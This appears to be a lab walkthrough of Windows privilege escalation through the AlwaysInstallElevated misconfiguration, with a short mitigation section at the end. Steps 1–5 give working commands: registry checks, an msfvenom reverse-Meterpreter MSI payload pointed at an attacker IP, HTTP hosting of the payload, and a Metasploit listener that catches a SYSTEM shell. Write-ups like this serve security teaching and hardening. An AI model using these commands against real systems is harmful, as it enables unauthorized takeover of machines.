Exploiting AlwaysInstallElevated for Windows Privilege Escalation
🧠 Summary
In this walkthrough, I exploited the AlwaysInstallElevated privilege escalation technique on a vulnerable Windows machine. When both HKLM
and HKCU
registry keys for AlwaysInstallElevated are set to 1
, any .msi
file executed by a standard user will run with SYSTEM-level privileges. Below is a step-by-step breakdown of how I leveraged this misconfiguration to gain SYSTEM access.
🔍 Step 1: Confirming Registry Vulnerability
After gaining initial access to the target machine, I checked the registry for AlwaysInstallElevated values:
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Both were set to 0x1
, confirming the system is vulnerable.
💣 Step 2: Creating a Malicious MSI Payload
On my Kali attack box, I generated a reverse Meterpreter payload in MSI format using msfvenom
:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.119.123 -f msi -o setup.msi

🌐 Step 3: Hosting the Payload
I used Python to host the .msi
file over HTTP:
python3 -m http.server 80

📥 Step 4: Downloading and Executing on Victim Machine
On the victim machine, I opened Internet Explorer and navigated to the Kali host IP to download the payload.


🧠 Step 5: Listener Setup and Shell Access
On my Kali box, I launched a Metasploit listener to catch the reverse shell:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.2.119.123
run

The payload executed with SYSTEM privileges, as confirmed by the getuid
command.
🛡️ Mitigation
To prevent this type of privilege escalation:
- Set
AlwaysInstallElevated
to0
in bothHKLM
andHKCU
:reg add HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f reg add HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f
- Restrict user ability to run
.msi
installers - Use endpoint monitoring to alert on privilege escalations
🔗 MITRE ATT&CK Mapping
- T1548.002 – Abuse Elevation Control Mechanism: Bypass User Access Control
✅ Success: I escalated from user to SYSTEM by abusing AlwaysInstallElevated and a malicious MSI payload. Always validate registry settings during post-exploitation recon!
Stay sharp, and happy hacking! 🛠️